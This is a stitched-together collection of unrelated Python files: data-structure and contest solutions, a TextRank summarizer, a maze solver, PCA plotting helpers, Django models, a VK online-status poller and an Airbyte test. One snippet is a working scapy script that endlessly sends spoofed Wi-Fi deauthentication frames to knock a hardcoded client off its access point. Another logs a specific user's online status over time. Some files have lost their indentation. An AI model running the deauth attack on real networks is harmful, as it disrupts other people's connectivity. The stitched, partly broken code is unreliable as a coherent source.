        self._keyValMap[key] += 1
        curVal = self._keyValMap[key]
        # Add to the new bucket before emptying the old one so a neighbour
        # bucket needed for linking always exists.
        self._addKeyToBucket(curVal, key)
        if curVal != 1:
            self._deleteKeyFromBucket(curVal - 1, key)

    def dec(self, key):
        """Decrement key by 1; remove it entirely when its value reaches 0.

        :type key: str
        :rtype: void
        """
        if key not in self._keyValMap:
            return
        self._keyValMap[key] -= 1
        curVal = self._keyValMap[key]
        if curVal == 0:
            self._keyValMap.pop(key)
        if curVal != 0:
            self._addKeyToBucket(curVal, key)
        self._deleteKeyFromBucket(curVal + 1, key)

    def getMaxKey(self):
        """Return one key with the maximal value, or "" if empty.

        :rtype: str
        """
        maxBucket = self._dummyTail.prev
        if maxBucket.rank == 0:
            return ""
        # next(iter(...)) replaces the Python-2-only iter(...).next().
        return next(iter(maxBucket.keySet))

    def getMinKey(self):
        """Return one key with the minimal value, or "" if empty.

        :rtype: str
        """
        minBucket = self._dummyHead.next
        if minBucket.rank == 0:
            return ""
        return next(iter(minBucket.keySet))

    def _addKeyToBucket(self, value, key):
        """Add key to the bucket for `value`, creating and linking the bucket if needed."""
        if value not in self._valKeyMap:
            newBucket = Bucket(value)
            self._valKeyMap[value] = newBucket
            # One of the two neighbouring buckets always exists (rank 0 is
            # the dummy head), so link relative to whichever is present.
            prevBucket = self._valKeyMap.get(value - 1, None)
            nextBucket = self._valKeyMap.get(value + 1, None)
            if prevBucket:
                newBucket.next = prevBucket.next
                newBucket.prev = prevBucket
                prevBucket.next = newBucket
                newBucket.next.prev = newBucket
            else:
                newBucket.next = nextBucket
                newBucket.prev = nextBucket.prev
                nextBucket.prev = newBucket
                newBucket.prev.next = newBucket
        self._valKeyMap[value].keySet.add(key)

    def _deleteKeyFromBucket(self, value, key):
        """Remove key from the bucket for `value`; unlink the bucket when it empties."""
        deleteBucket = self._valKeyMap[value]
        deleteBucket.keySet.remove(key)
        if len(deleteBucket.keySet) == 0:
            self._valKeyMap.pop(value)
            # splice the emptied bucket out of the linked list
            deleteBucket.prev.next = deleteBucket.next
            deleteBucket.next.prev = deleteBucket.prev
# if __name__ == '__main__':
# myds = AllOne()
# print myds.getMaxKey()
# print myds.getMinKey()
# myds.inc("inc")
# print myds.getMaxKey()
# print myds.getMinKey()
# Your AllOne object will be instantiated and called as such:
# obj = AllOne()
# obj.inc(key)
# obj.dec(key)
# param_3 = obj.getMaxKey()
# param_4 = obj.getMinKey() |
# For each of 10 test cases: read a 100x100 grid and count, column by column,
# every cell with value 2 that has a cell with value 1 somewhere above it.
for tc in range(1, 11):
    N = int(input())  # header value; not used by the counting pass below
    grid = [list(map(int, input().split())) for _ in range(100)]
    total = 0
    for col in range(100):
        armed = 0  # set once a 1 has been seen above in this column
        for row in range(100):
            cell = grid[row][col]
            if cell == 1:
                armed = 1
            elif cell == 2 and armed:
                total += 1
                armed = 0
    print('#{} {}'.format(tc, total))
# if elif else statement
# show ticket pricing
# 1 to 3 (free)
# 4 to 10 (150)
# 11 to 60 (250)
# above 60 (200)
def ticket_price(age):
    """Return the ticket-price message for the given age.

    Fixes the original boundary bug where age 11 matched no branch
    (`3 < age <= 10` followed by `11 < age <= 60` skipped exactly 11).
    """
    if age <= 0:
        return "you can't watch"
    elif age <= 3:
        return "Ticket Price : Free"
    elif age <= 10:
        return "Ticket Price : 150"
    elif age <= 60:
        return "Ticket Price : 250"
    else:
        return "Ticket Price : 200"

if __name__ == "__main__":
    age = int(input("please input your age: "))
    print(ticket_price(age))
import os
import re
def get_file_names(folderpath, output_file):
    """Write the names of the entries directly inside folderpath to output_file, one per line."""
    # List before opening the output file so a just-created output_file inside
    # folderpath cannot appear in its own listing.
    entries = os.listdir(folderpath)
    with open(output_file, 'w') as out:
        for entry in entries:
            out.write(entry + "\n")
def get_all_file_names(path, output_file):
    """Recursively write every file and directory path under `path` to output_file.

    Paths are written relative to `path` (leading separator included), one per
    line, files before directories within each visited folder (bottom-up walk).
    """
    collected = []
    for root, dirs, files in os.walk(path, topdown=False):
        for name in files + dirs:
            collected.append(os.path.join(root, name)[len(path):])
    with open(output_file, 'w') as out:
        for rel in collected:
            out.write(rel + "\n")
def print_line_one(file_names):
    """Print the first line of each named file (blank for an empty file).

    Uses readline() instead of readlines()[0]: it avoids loading the whole
    file and returns '' on an empty file rather than raising IndexError.
    """
    for name in file_names:
        with open(name, 'r') as file_object:
            first = file_object.readline()
            print("\nFirst line in " + "\"" + name + "\":\n" + "\n" + first)
def print_emails(file_names):
    """Print every line containing an '@' from each of the given files."""
    for name in file_names:
        with open(name, 'r') as file_object:
            for line in file_object.readlines():
                if "@" in line:
                    print(line)
                    # print("File: " + name + "\n" + line)
def write_headlines(md_files, out):
    """Collect every markdown headline (line starting with '#') from md_files
    and write them, in order, to the file `out`."""
    headlines = []
    for path in md_files:
        with open(path, "r") as fh:
            # startswith("#") is equivalent to the original re.search("^#", line)
            headlines.extend(line for line in fh if line.startswith("#"))
    with open(out, "w") as oh:
        oh.writelines(headlines)
|
#-*-coding: utf-*-
from itertools import combinations
from nltk.tokenize import sent_tokenize, RegexpTokenizer
from nltk.stem.snowball import RussianStemmer
import networkx as nx
from sklearn.feature_extraction.text import CountVectorizer
import math
import re
import nltk
# nltk.download('stopwords')
def treatment_text(text):
    """Normalize text for summarization: keep only Cyrillic/Latin letters,
    digits and ',.?'; every other character becomes a space, and runs of
    spaces are collapsed to a single space."""
    cleaned = re.sub("[^а-яА-Яa-zЁёA-Z0-9,.?]", " ", str(text))
    cleaned = cleaned.replace('\t', ' ').replace('\n', ' ')
    while '  ' in cleaned:
        cleaned = cleaned.replace('  ', ' ')
    return cleaned
class TextRank():
    """Extractive summarizer: ranks sentences by PageRank over a sentence-similarity graph."""

    def __init__(self):
        # Token pattern kept for API compatibility; tokenization below uses RegexpTokenizer.
        self.pattern = "(?u)\\b[\\w-]+\\b"

    def similarity_1(self, s1, s2):
        """Normalized set overlap: |s1 ∩ s2| / (|s1| + |s2|); 0.0 when either is empty."""
        if not len(s1) or not len(s2):
            return 0.0
        return len(s1.intersection(s2)) / (1.0 * (len(s1) + len(s2)))

    def similarity_2(self, s1, s2):
        """Cosine similarity between bag-of-words vectors of the two token sets."""
        doc1 = ' '.join(map(str, list(s1)))
        doc2 = ' '.join(map(str, list(s2)))
        vectorizer = CountVectorizer()
        vectorizer.fit_transform([doc1, doc2])
        vec1 = vectorizer.transform([doc1]).toarray()[0]
        vec2 = vectorizer.transform([doc2]).toarray()[0]
        dot = 0
        norm1 = 0
        norm2 = 0
        for a, b in zip(vec1, vec2):
            dot += a * b
            norm1 += a * a
            norm2 += b * b
        # epsilon keeps the division safe for zero vectors
        norm2 = math.sqrt(norm2) + 1e-8
        norm1 = math.sqrt(norm1) + 1e-8
        return dot / (norm1 * norm2)

    def textrank(self, text, similar='serense'):
        """Score sentences; returns (index, score, sentence) sorted by descending PageRank."""
        text = treatment_text(text)
        # Keep only sentences longer than six words.
        kept = list(filter(lambda s: len(s.split()) > 6, text.split('.')))
        text = '.'.join(kept)
        sentences = sent_tokenize(text)
        tokenizer = RegexpTokenizer(r'\w+')
        stemmer = RussianStemmer()
        words = [set(stemmer.stem(word) for word in tokenizer.tokenize(sentence.lower()))
                 for sentence in sentences]
        pairs = combinations(range(len(sentences)), 2)
        if similar == 'serense':
            scores = [(i, j, self.similarity_1(words[i], words[j])) for i, j in pairs]
        if similar == 'cos':
            scores = [(i, j, self.similarity_2(words[i], words[j])) for i, j in pairs]
        # Drop zero-similarity edges before building the graph.
        scores = filter(lambda x: x[2], scores)
        graph = nx.Graph()
        graph.add_weighted_edges_from(scores)
        pr = nx.pagerank(graph)
        return sorted(((i, pr[i], s) for i, s in enumerate(sentences) if i in pr),
                      key=lambda x: pr[x[0]], reverse=True)

    def extract(self, text, mera='serense', n=5):
        """Return the top-n ranked sentences, re-sorted into document order."""
        ranked = self.textrank(text, similar=mera)
        top_n = sorted(ranked[:n])
        summary = ' '.join(item[2] for item in top_n)
        if summary != '':
            return summary
        else:
            return 'Слишком маленький текст (минимум 5 предложений)'
|
#!/usr/bin/python
# Solution to problem 887A in codeforces
input = raw_input()
first_one_found = False
zero_count = 0
for letter in str(input):
if not first_one_found and letter == "1":
first_one_found = True
if first_one_found and letter == "0":
zero_count += 1
if zero_count >= 6:
print "yes"
else:
print "no" |
import sys
from heapq import heappush, heappop
class Node:
    """Maze graph vertex; `portal` holds its two-letter label ('' when none),
    `edges` holds (weight, level_delta, neighbour) tuples."""
    __slots__ = ('portal', 'edges')

    def __init__(self, portal='', edges=None):
        self.portal = portal
        self.edges = edges or []

    def __lt__(self, other):
        # Arbitrary but total ordering so heapq can break priority ties.
        return True
def out(x, y, bounds):
    """True when (x, y) lies outside the inclusive rectangle bounds=(x0, y0, x1, y1)."""
    x0, y0, x1, y1 = bounds
    return not (x0 <= x <= x1 and y0 <= y <= y1)
def add_portals(nodes, portals, bounds):
    """Pair single portal letters into two-letter labels, attach each label to
    the adjacent maze node, and connect matching portal pairs with edges.

    Portal edges have weight 1 and a level delta of +/-1: an outer portal
    (outside `bounds`, i.e. on the doughnut's rim) descends a level (-1) and
    its partner ascends (+1) — used by the recursive-maze search.
    Returns the 'AA' start node and 'ZZ' goal node.
    """
    aa = zz = None
    ports = {}  # label -> (node, x, y) of the first endpoint seen
    while portals:
        (x, y), c = portals.popitem()
        port = None
        node = None
        # The partner letter is horizontally or vertically adjacent; the
        # walkable tile sits just beyond the letter pair on either side.
        if (x-1, y) in portals:
            port = portals.pop((x-1, y)) + c
            node = nodes.get((x-2, y)) or nodes.get((x+1, y))
        elif (x+1, y) in portals:
            port = c + portals.pop((x+1, y))
            node = nodes.get((x-1, y)) or nodes.get((x+2, y))
        elif (x, y-1) in portals:
            port = portals.pop((x, y-1)) + c
            node = nodes.get((x, y-2)) or nodes.get((x, y+1))
        elif (x, y+1) in portals:
            port = c + portals.pop((x, y+1))
            node = nodes.get((x, y-1)) or nodes.get((x, y+2))
        if port:
            assert node
            node.portal = port
            if port in ports:
                # Second endpoint of this label: link the pair both ways with
                # opposite level deltas.
                p, xp, yp = ports[port]
                d = -1 if out(xp, yp, bounds) else 1
                p.edges.append((1, d, node))
                node.edges.append((1, -d, p))
            else:
                ports[port] = node, x, y
            # AA and ZZ are unpaired; remember them as start/goal.
            if port == 'AA':
                aa = node
            elif port == 'ZZ':
                zz = node
    return aa, zz
def scan_line(y, line, nodes, portals, bounds):
    """Parse one row of the maze picture.

    Creates a Node for every open cell, records uppercase portal letters in
    `portals`, links adjacent open cells with (1, 0, node) edges, and grows
    `bounds` (mutated in place) toward the wall rectangle.
    """
    last = None  # node of the previous, horizontally adjacent open cell
    for x, c in enumerate(line):
        if c in '# ':
            if c == '#':
                # First wall seen seeds the top-left bound; every wall pushes
                # the bottom-right bound.
                # NOTE(review): `not bounds[0]` treats 0 as "unset", which
                # assumes the outer wall never sits at column/row 0 — confirm
                # against the input format.
                if not bounds[0]:
                    bounds[0] = x
                if not bounds[1]:
                    bounds[1] = y
                bounds[2] = x
                bounds[3] = y
            last = None
            continue
        if c.isupper():
            # Portal letter: paired into a label later by add_portals.
            portals[x, y] = c
            continue
        node = Node()
        if last:
            node.edges.append((1, 0, last))
            last.edges.append((1, 0, node))
        # Link to the open cell directly above, if any.
        up = nodes.get((x, y-1))
        if up:
            node.edges.append((1, 0, up))
            up.edges.append((1, 0, node))
        nodes[x, y] = node
        last = node
def read_file(name):
    """Parse the maze file `name` into a node graph.

    Returns (nodes, start, goal) where start/goal are the 'AA'/'ZZ' nodes.
    """
    nodes = {}
    portals = {}
    bounds = [0, 0, 0, 0]
    with open(name) as fh:
        for y, line in enumerate(fh):
            scan_line(y, line.rstrip(), nodes, portals, bounds)
    start, goal = add_portals(nodes, portals, bounds)
    return nodes, start, goal
def simplify(nodes):
    """Collapse corridors: repeatedly prune dead ends and splice degree-2
    nodes into a single weighted edge; portal nodes are never removed.

    Returns a new dict keeping only nodes that still have edges.
    """
    while True:
        some = False  # did this pass change anything?
        for n in nodes.values():
            if n.portal:
                continue
            if len(n.edges) == 1:
                # Dead end: drop it together with its neighbour's back-edge.
                w, _, e = n.edges.pop()
                e.edges.remove((w, 0, n))
                some = True
            elif len(n.edges) == 2:
                # Corridor: connect both neighbours directly with the summed
                # weight and detach this node.
                wl, _, left = n.edges.pop()
                wr, _, right = n.edges.pop()
                w = wl + wr
                left.edges.remove((wl, 0, n))
                left.edges.append((w, 0, right))
                right.edges.remove((wr, 0, n))
                right.edges.append((w, 0, left))
                some = True
        if not some:
            break
    nodes = {k: n for k, n in nodes.items() if n.edges}
    return nodes
def search(root, target):
    """Dijkstra shortest distance from root to target (None if unreachable)."""
    frontier = [(0, root)]
    visited = set()
    while frontier:
        dist, node = heappop(frontier)
        if node == target:
            return dist
        visited.add(node)
        for weight, _, neighbour in node.edges:
            if neighbour not in visited:
                heappush(frontier, (dist + weight, neighbour))
def search_rec(root, target):
    """Dijkstra over (node, level) states for the recursive-maze variant.

    Each edge's second element shifts the level; level below 0 is forbidden
    and the target only counts at level 0.
    """
    frontier = [(0, 0, root)]
    INF = float('inf')
    best = {}  # (node, level) -> best known distance
    while frontier:
        dist, level, node = heappop(frontier)
        if level == 0 and node == target:
            return dist
        for weight, delta, neighbour in node.edges:
            next_level = level + delta
            if next_level < 0:
                continue
            if dist + weight < best.get((neighbour, next_level), INF):
                best[neighbour, next_level] = dist + weight
                heappush(frontier, (dist + weight, next_level, neighbour))
# Entry point: maze file defaults to 'input.txt', overridable via argv[1].
nodes, root, target = read_file('input.txt' if len(sys.argv) < 2 else sys.argv[1])
nodes = simplify(nodes)
best = search(root, target)
print('Day 20, part 1:', best)
best = search_rec(root, target)
print('Day 20, part 2:', best)
|
""" Librairie personnelle effectuer des graphiques sur Analyse en
composantes principales
"""
#! /usr/bin/env python3
# coding: utf-8
# ====================================================================
# Outil visualisation - projet 3 Openclassrooms
# Version : 0.0.0 - CRE LR 13/03/2021
# Version : 0.0.1 - CRE LR 30/03/2021 P4 Openclassrooms
# ====================================================================
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.collections import LineCollection
import matplotlib.patches as mpatches
import seaborn as sns
from sklearn import decomposition
# --------------------------------------------------------------------
# -- VERSION
# --------------------------------------------------------------------
__version__ = '0.0.1'
# --------------------------------------------------------------------
# Analyse en composantes principales
# --------------------------------------------------------------------
def creer_analyse_composantes_principales(
        x_train,
        liste_tuples_composantes,
        affiche_graph=True):
    '''
    Run a principal component analysis of x_train and plot its diagnostics:
    optional component distribution / cumulative-variance / loadings plots,
    then the scree plot and the correlation circle(s).

    Parameters
    ----------
    x_train : data to analyse (DataFrame with named columns), mandatory
    liste_tuples_composantes : list of component-index tuples to display,
        e.g. PC1/PC2 and PC3/PC4 ==> [(0, 1), (2, 3)], mandatory
    affiche_graph : whether to show the extra diagnostic plots
    Returns
    -------
    None.
    '''
    # Columns used for the PCA
    cols_acp = x_train.columns.to_list()
    # One component per input column
    n_comp = len(cols_acp)
    # Fit the principal components
    pca = decomposition.PCA(n_components=n_comp)
    pca.fit(x_train)
    if affiche_graph:
        # Distribution of the projected principal components
        C = pca.transform(x_train)
        plt.figure(figsize=(8, 5))
        plt.boxplot(C)
        plt.title('Distribution des composantes principales')
        plt.grid(False)
        plt.show()
        # Percentage of variance preserved by each component
        variances = pca.explained_variance_ratio_
        # Cumulative sum of those variances
        meilleur_dims = np.cumsum(variances)
        # Locate where the cumulative variance crosses 95% and 99%
        plt.plot(meilleur_dims)
        # argmax for > 95 %
        best = np.argmax(meilleur_dims > 0.95)
        plt.axhline(y=0.95, color='r')
        plt.text(2, 0.96, '>95%', color='r', fontsize=10)
        plt.axvline(x=best, color='r')
        # argmax for > 99 %
        best99 = np.argmax(meilleur_dims > 0.99)
        plt.axhline(y=0.99, color='g')
        plt.text(2, 1, '>99%', color='g', fontsize=10)
        plt.axvline(x=best99, color='g')
        plt.title('Taux cumulé de variances expliquées pour les composantes')
        plt.xlabel('Nombre de composantes')
        plt.ylabel('Taux cumulé des variances')
        plt.show()
        print(f'Nombre de composantes expliquant 95% de la variance : {best}')
        print(
            f'Nombre de composantes expliquant 99% de la variance : {best99}')
        df_acp = pd.DataFrame(pca.components_,
                              index=['PC' + str(i + 1) for i in range(n_comp)],
                              columns=cols_acp).T
        # Heatmap of the principal-component loadings
        fig, ax = plt.subplots(figsize=(8, 8))
        palette = sns.diverging_palette(240, 10, n=9)
        sns.heatmap(df_acp, fmt='.2f',
                    cmap=palette, vmin=-1, vmax=1, center=0, ax=ax)
        plt.title('Coefficient des composantes principales', fontsize=14)
        plt.show()
    # Scree plot of the eigenvalues
    display_scree_plot(pca)
    # Correlation circle(s)
    pcs = pca.components_
    display_circles(
        pcs,
        n_comp,
        pca,
        liste_tuples_composantes,
        labels=np.array(cols_acp),
        label_rotation=0,
        lims=None,
        width=7,
        n_cols=1)
# --------------------------------------------------------------------
# -- AFFICHE LE CERCLE DES CORRELATIONS
# --------------------------------------------------------------------
def display_circles(
        pcs,
        n_comp,
        pca,
        axis_ranks,
        labels=None,
        label_rotation=0,
        lims=None,
        width=16,
        n_cols=3):
    """
    Display the PCA correlation circle(s), one subplot per factorial plane.

    Parameters
    ----------
    pcs : PCA component loadings (components x variables), mandatory
    n_comp : number of PCA components
    pca : fitted sklearn PCA decomposition, mandatory
    axis_ranks : list of (d1, d2) component-index pairs to plot, mandatory
    labels : variable labels, optional (None by default)
    label_rotation : label rotation in degrees, optional (0 by default)
    lims : (xmin, xmax, ymin, ymax) limits, optional (None by default)
    width : figure width, optional
    n_cols : number of subplot columns, optional
    Returns
    -------
    None.
    """
    n_rows = (n_comp + 1) // n_cols
    fig = plt.figure(figsize=(width, n_rows * width / n_cols))
    # loop over the requested factorial planes
    for i, (d1, d2) in enumerate(axis_ranks):
        if d2 < n_comp:
            ax = fig.add_subplot(n_rows, n_cols, i + 1)
            # axis limits: explicit, unit square, or data-driven for many variables
            if lims is not None:
                xmin, xmax, ymin, ymax = lims
            elif pcs.shape[1] < 30:
                xmin, xmax, ymin, ymax = -1, 1, -1, 1
            else:
                xmin, xmax, ymin, ymax = min(pcs[d1, :]), max(
                    pcs[d1, :]), min(pcs[d2, :]), max(pcs[d2, :])
            # arrows; with 30+ variables, draw faint plain lines instead
            if pcs.shape[1] < 30:
                plt.quiver(np.zeros(pcs.shape[1]),
                           np.zeros(pcs.shape[1]),
                           pcs[d1,
                               :],
                           pcs[d2,
                               :],
                           angles='xy',
                           scale_units='xy',
                           scale=1,
                           color='black')
            else:
                lines = [[[0, 0], [x, y]] for x, y in pcs[[d1, d2]].T]
                ax.add_collection(
                    LineCollection(
                        lines,
                        alpha=.1,
                        color='black'))
            # variable names (only those inside the current limits)
            if labels is not None:
                for text, (x, y) in enumerate(pcs[[d1, d2]].T):
                    if x >= xmin and x <= xmax and y >= ymin and y <= ymax:
                        ax.text(
                            x,
                            y,
                            labels[text],
                            fontsize='14',
                            ha='center',
                            va='center',
                            rotation=label_rotation,
                            color="black",
                            alpha=0.5)
            # unit circle
            circle = plt.Circle((0, 0), 1, facecolor='none', edgecolor='k')
            ax.add_artist(circle)
            # fix the plot limits
            ax.set(xlim=(xmin, xmax), ylim=(ymin, ymax))
            ax.set_aspect('equal')
            # horizontal and vertical reference lines
            ax.plot([-1, 1], [0, 0], color='black', ls='--')
            ax.plot([0, 0], [-1, 1], color='black', ls='--')
            # axis names, with the percentage of explained inertia
            ax.set_xlabel(
                'PC{} ({}%)'.format(
                    d1 +
                    1,
                    round(
                        100 *
                        pca.explained_variance_ratio_[d1],
                        1)))
            ax.set_ylabel(
                'PC{} ({}%)'.format(
                    d2 +
                    1,
                    round(
                        100 *
                        pca.explained_variance_ratio_[d2],
                        1)))
            ax.set_title(
                'PCA correlation circle (PC{} and PC{})'.format(
                    d1 + 1, d2 + 1))
            plt.axis('square')
            plt.grid(False)
    plt.tight_layout()
    plt.show()
# --------------------------------------------------------------------
# -- AFFICHE LE PLAN FACTORIEL
# --------------------------------------------------------------------
def display_factorial_planes(
        X_proj,
        n_comp,
        pca,
        axis_ranks,
        couleurs=None,
        labels=None,
        width=16,
        alpha=1,
        n_cols=3,
        illus_var=None,
        lab_on=True,
        size=10):
    """
    Display the projection of the individuals on the factorial planes.

    Parameters
    ----------
    X_proj : projected data (individuals x components), mandatory
    n_comp : number of components, mandatory
    pca : fitted sklearn PCA decomposition, mandatory
    axis_ranks : list of (d1, d2) component-index pairs to plot
    couleurs : list of colors, one per category of illus_var, optional
    labels : per-point labels, optional (None by default)
    width : figure width, optional
    alpha : point transparency, optional (1 by default)
    n_cols : number of subplot columns, optional
    illus_var : categorical variable used to color the points, optional
    lab_on : whether to draw the point labels, optional
    size : marker size, optional
    Returns
    -------
    None.
    """
    n_rows = (n_comp + 1) // n_cols
    fig = plt.figure(figsize=(width, n_rows * width / n_cols))
    # loop over each requested factorial plane
    for i, (d1, d2) in (enumerate(axis_ranks)):
        if d2 < n_comp:
            ax = fig.add_subplot(n_rows, n_cols, i + 1)
            # scatter the individuals, colored by category when illus_var is given
            if illus_var is None:
                ax.scatter(X_proj[:, d1], X_proj[:, d2], alpha=alpha, s=size)
            else:
                illus_var = np.array(illus_var)
                label_patches = []
                colors = couleurs
                i = 0
                for value in np.unique(illus_var):
                    sel = np.where(illus_var == value)
                    ax.scatter(X_proj[sel, d1], X_proj[sel, d2],
                               alpha=alpha, label=value, c=colors[i])
                    label_patch = mpatches.Patch(color=colors[i],
                                                 label=value)
                    label_patches.append(label_patch)
                    i += 1
                ax.legend(
                    handles=label_patches,
                    bbox_to_anchor=(
                        1.05,
                        1),
                    loc=2,
                    borderaxespad=0.,
                    facecolor='white')
            # per-point labels
            if labels is not None and lab_on:
                for text_lab, (x, y) in enumerate(X_proj[:, [d1, d2]]):
                    ax.text(x, y, labels[text_lab],
                            fontsize='14', ha='center', va='center')
            # symmetric limits with a 10% margin
            bound = np.max(np.abs(X_proj[:, [d1, d2]])) * 1.1
            ax.set(xlim=(-bound, bound), ylim=(-bound, bound))
            # horizontal and vertical reference lines
            ax.plot([-100, 100], [0, 0], color='grey', ls='--')
            ax.plot([0, 0], [-100, 100], color='grey', ls='--')
            # axis names, with the percentage of explained inertia
            ax.set_xlabel(
                'F{} ({}%)'.format(
                    d1 +
                    1,
                    round(
                        100 *
                        pca.explained_variance_ratio_[d1],
                        1)))
            ax.set_ylabel(
                'F{} ({}%)'.format(
                    d2 +
                    1,
                    round(
                        100 *
                        pca.explained_variance_ratio_[d2],
                        1)))
            ax.set_title(
                'Projection des individus (sur F{} et F{})'.format(
                    d1 + 1, d2 + 1))
            plt.grid(False)
    plt.tight_layout()
# --------------------------------------------------------------------
# -- AFFICHE L'EBOULIS DES VALEURS PROPRES
# --------------------------------------------------------------------
def display_scree_plot(pca):
    '''
    Display the scree plot: explained-variance percentage per component as
    bars, with the cumulative percentage as a curve on a secondary axis.

    Parameters
    ----------
    pca : fitted sklearn PCA decomposition, mandatory.
    Returns
    -------
    None.
    '''
    taux_var_exp = pca.explained_variance_ratio_
    scree = taux_var_exp * 100
    plt.bar(np.arange(len(scree)) + 1, scree, color='SteelBlue')
    ax1 = plt.gca()
    ax2 = ax1.twinx()
    # cumulative explained-variance curve on the secondary y-axis
    ax2.plot(np.arange(len(scree)) + 1, scree.cumsum(), c='red', marker='o')
    ax2.set_ylabel('Taux cumulatif de l\'inertie')
    ax1.set_xlabel('Rang de l\'axe d\'inertie')
    ax1.set_ylabel('Pourcentage d\'inertie')
    # annotate each bar with its rounded percentage
    for i, p in enumerate(ax1.patches):
        ax1.text(
            p.get_width() /
            5 +
            p.get_x(),
            p.get_height() +
            p.get_y() +
            0.3,
            '{:.0f}%'.format(
                taux_var_exp[i] *
                100),
            fontsize=8,
            color='k')
    plt.title('Eboulis des valeurs propres')
    plt.gcf().set_size_inches(8, 4)
    plt.grid(False)
    plt.show(block=False)
|
def appendsums(lst):
    """Append 25 new terms to lst in place, each the sum of the last three elements.

    Requires len(lst) >= 3. (Renamed the local that shadowed the builtin `sum`.)
    """
    for _ in range(25):
        lst.append(lst[-1] + lst[-2] + lst[-3])

sum_three = [0, 1, 2]
appendsums(sum_three)
print(sum_three[20])
|
# coding:utf-8
# 把街道按照上面发生的所有犯罪的分布进行编码
import pandas as pd
import numpy as np
import pickle
file_key = 'fold_1'
original_train = pd.read_csv('../0_direct/' + file_key + '.csv')
# 统计各个街道上面各类犯罪的分布,街道编号由1到2128
street_stats = []
for i in range(2129):
street_stats.append(np.zeros(40))
for i in range(len(original_train)):
addresses = [0, 0]
addresses[0] = int(original_train.loc[i, 'Address1'])
addresses[1] = int(original_train.loc[i, 'Address2'])
category = int(original_train.loc[i, 'Category'])
for street in addresses:
if street > 0:
street_stats[street][category] += 1
if (i % 20000 == 0):
print i
pickle.dump(street_stats, file('street_counts' + file_key + '.pickle', 'w')) |
#!/usr/bin/env python
#coding:utf-8
from scapy.all import *
def wifi_down(client_mac, bssid):
    """Continuously send 802.11 deauthentication frames to `client_mac`,
    spoofed as coming from the AP `bssid`, out of interface wlan0.

    Requires root and a wireless card in monitor mode; only use against
    networks you are authorized to test. Loops until the process is killed.
    """
    # Dot11Deauth with reason code 0; addr1=target client, addr2/addr3=AP.
    pkt = RadioTap() / Dot11(subtype=0x00c, addr1=client_mac, addr2=bssid, addr3=bssid) / Dot11Deauth(reason=0)
    while(True):
        sendp(pkt, iface='wlan0')

if __name__ == '__main__':
    wifi_down('ec:1d:7f:bc:b3:a8', 'E4:D3:32:4B:03:9C')
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Blogs(models.Model):
    """A blog post authored by a User; deleted along with its author (CASCADE)."""
    title = models.CharField(max_length=200)
    time = models.DateTimeField(auto_now_add=True)  # set once at creation
    body = models.TextField()
    # Image is required (blank=False) and stored under MEDIA_ROOT/blogs/images/.
    image = models.ImageField(blank=False, upload_to='blogs/images/')
    user = models.ForeignKey(User, on_delete=models.CASCADE)

    def __str__(self):
        # Shown in the admin and in shell listings.
        return self.title
class Comments(models.Model):
    """A comment on a blog post; reachable as blog.comments via the related name."""
    name = models.CharField(max_length=200)      # commenter's display name
    body = models.TextField(blank=True)          # comment text may be empty
    time = models.DateTimeField(auto_now_add=True)
    blog = models.ForeignKey(Blogs, on_delete=models.CASCADE, related_name='comments')

    def __str__(self):
        # Added for consistency with the sibling Blogs/Posts models, which
        # both define __str__ for readable admin/shell listings.
        return self.name
class Posts(models.Model):
    """A short link post: title, blurb, image, and an external URL."""
    title = models.CharField(max_length=200)
    time = models.DateTimeField(auto_now_add=True)  # set once at creation
    description = models.CharField(max_length=300)
    image = models.ImageField(upload_to='posts/images/')
    url = models.URLField()

    def __str__(self):
        # Shown in the admin and in shell listings.
        return self.title
|
from distutils.core import setup
from Cython.Build import cythonize

# Build script: compiles ObsPred.pyx into a C extension
# (run: python setup.py build_ext --inplace).
setup(ext_modules = cythonize("ObsPred.pyx"))
|
import threading
from datetime import datetime
import time
from app.model.SqlExecuter import SqlExecuter
from app.util.vkApiHelper import VKAPIHelpers
class lookerThread(threading.Thread):
    """Background poller: every `interval` seconds, fetch a VK user's online
    flag via the API and insert it into the `online` table."""

    # Class-level defaults; each is overwritten per-instance in __init__.
    name = None
    vk_id = -1
    api = None
    db = None
    interval = None
    # NOTE(review): shadows threading.Thread.is_alive(); kept for compatibility
    # since run() and external callers use it as the stop flag.
    is_alive = True

    def __init__(self, name, vk_id, api, intervalInSec):
        threading.Thread.__init__(self)
        self.name = name
        self.vk_id = vk_id
        self.api = api
        self.interval = intervalInSec
        # self.db = db

    def run(self):
        """Poll loop; exits when self.is_alive is set falsy."""
        while self.is_alive:
            fields = ["photo_400_orig", "photo_200", "photo_100", "photo_200_orig", "photo_50", "photo_max", "photo_max_orig"]
            try:
                request = self.api.users.get(user_id=self.vk_id, fields=['online'] + fields)
            except Exception:
                # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
                # can still stop the thread; on API failure, back off and retry.
                time.sleep(30)
                continue
            online = request[0]['online']
            image_url = VKAPIHelpers.getAvailablePhotoUrl(request[0], fields)
            cursor = SqlExecuter.executeModification('insert into online("online","vk_id") values({},{});'.format(online, self.vk_id))
            time.sleep(self.interval)
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import json
import subprocess
import sys
import pytest
from airbyte_cdk.models import AirbyteErrorTraceMessage, AirbyteLogMessage, AirbyteMessage, AirbyteTraceMessage
def test_uncaught_exception_handler():
    """Verify that an uncaught non-BaseException raise in a connector process
    emits exactly one FATAL LOG message and one ERROR TRACE message (in that
    order) on stdout, and nothing on stderr."""
    # Child interpreter installs the handler, then `raise 1` (not an exception type).
    cmd = "from airbyte_cdk.logger import init_logger; from airbyte_cdk.exception_handler import init_uncaught_exception_handler; logger = init_logger('airbyte'); init_uncaught_exception_handler(logger); raise 1"
    exception_message = "exceptions must derive from BaseException"
    exception_trace = (
        "Traceback (most recent call last):\n"
        ' File "<string>", line 1, in <module>\n'
        "TypeError: exceptions must derive from BaseException"
    )
    expected_log_message = AirbyteMessage(
        type="LOG", log=AirbyteLogMessage(level="FATAL", message=f"{exception_message}\n{exception_trace}")
    )
    expected_trace_message = AirbyteMessage(
        type="TRACE",
        trace=AirbyteTraceMessage(
            type="ERROR",
            emitted_at=0.0,
            error=AirbyteErrorTraceMessage(
                failure_type="system_error",
                message="Something went wrong in the connector. See the logs for more details.",
                internal_message=exception_message,
                stack_trace=f"{exception_trace}\n",
            ),
        ),
    )
    # The child exits non-zero, so check_output raises CalledProcessError.
    with pytest.raises(subprocess.CalledProcessError) as err:
        subprocess.check_output([sys.executable, "-c", cmd], stderr=subprocess.STDOUT)
